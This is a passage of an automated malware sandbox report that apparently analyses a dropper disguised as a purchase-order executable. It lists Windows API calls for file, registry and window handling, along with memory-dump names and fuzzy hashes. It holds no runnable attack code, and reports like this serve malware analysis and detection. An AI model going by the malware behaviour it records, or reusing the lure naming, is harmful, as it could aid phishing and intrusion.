                                                • API String ID: 334405425-0
                                                • Opcode ID: 1bad162e77e34ecb8eb13f55f993608a5ff127250da7c3603d2b86ad5c63d419
                                                • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                • Opcode Fuzzy Hash: 1bad162e77e34ecb8eb13f55f993608a5ff127250da7c3603d2b86ad5c63d419
                                                • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                APIs
                                                  • Part of subcall function 004065FD: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406608
                                                  • Part of subcall function 004065FD: FindClose.KERNEL32(00000000), ref: 00406614
                                                • lstrlenW.KERNEL32 ref: 00402299
                                                • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FileFindlstrlen$CloseFirstOperation
                                                • String ID:
                                                • API String ID: 1486964399-0
                                                • Opcode ID: de517320b8b7631ad419df09021d9eeaad91b680213a75300812e1168bc9d6ca
                                                • Instruction ID: 6269ee181bc4fdd248ee35923937f3e1ab67e15396db9274ddd7ede6479e46a9
                                                • Opcode Fuzzy Hash: de517320b8b7631ad419df09021d9eeaad91b680213a75300812e1168bc9d6ca
                                                • Instruction Fuzzy Hash: 44117071900318A6DB10EFF98E4999EB6B8AF04354F54443FB805F72D1D6B8C4419B59
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst14AC.tmp,00000000,00000011,00000002), ref: 00402557
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Enum$CloseValue
                                                • String ID:
                                                • API String ID: 397863658-0
                                                • Opcode ID: 5a9a61952417b6bfe6b89a24e65653c5098fd890d3eefb72e287b860fa7248b6
                                                • Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
                                                • Opcode Fuzzy Hash: 5a9a61952417b6bfe6b89a24e65653c5098fd890d3eefb72e287b860fa7248b6
                                                • Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst14AC.tmp,00000000,00000011,00000002), ref: 00402557
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 30a88777c351d87c576ad82697aa8c74236b6c04a157dfa6a484cb743da54f5e
                                                • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                                • Opcode Fuzzy Hash: 30a88777c351d87c576ad82697aa8c74236b6c04a157dfa6a484cb743da54f5e
                                                • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                APIs
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CloseDeleteValue
                                                • String ID:
                                                • API String ID: 2831762973-0
                                                • Opcode ID: b4ed941283cc42cbc895d58b8121f3ae351412458d2bfbbd1978ef2183ef1513
                                                • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                • Opcode Fuzzy Hash: b4ed941283cc42cbc895d58b8121f3ae351412458d2bfbbd1978ef2183ef1513
                                                • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405405
                                                  • Part of subcall function 0040427D: SendMessageW.USER32(00010446,00000000,00000000,00000000), ref: 0040428F
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 00405451
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: dfabe2086e3d1963a552e06cb88e9d9118769e23e40608fad565f0601b73f887
                                                • Instruction ID: a601a601f0e5ec3bbde9495229b78238806b827976c2972870ecc0a3321c7521
                                                • Opcode Fuzzy Hash: dfabe2086e3d1963a552e06cb88e9d9118769e23e40608fad565f0601b73f887
                                                • Instruction Fuzzy Hash: 85F090765405009BD7015B949D01BE777A4EFD431AF09843EFE85722E09B7958828E6D
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                                • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                                APIs
                                                • ShowWindow.USER32(00010452,?), ref: 00401587
                                                • ShowWindow.USER32(0001044C), ref: 0040159C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 034276f51d0b42c553a83b344e0a7361816c93116213b78b32cfce19cc20a90a
                                                • Instruction ID: f806313cc2b23e457bf0aacbdd07ca6dd900f465a881214a0c79a18979c994cc
                                                • Opcode Fuzzy Hash: 034276f51d0b42c553a83b344e0a7361816c93116213b78b32cfce19cc20a90a
                                                • Instruction Fuzzy Hash: 67E08637B141049BCB15CFA4ED808AE77A6EB88321324047FE502B3290CA75BD40CF38
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                  • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                  • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                  • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                • Opcode Fuzzy Hash: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                  • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
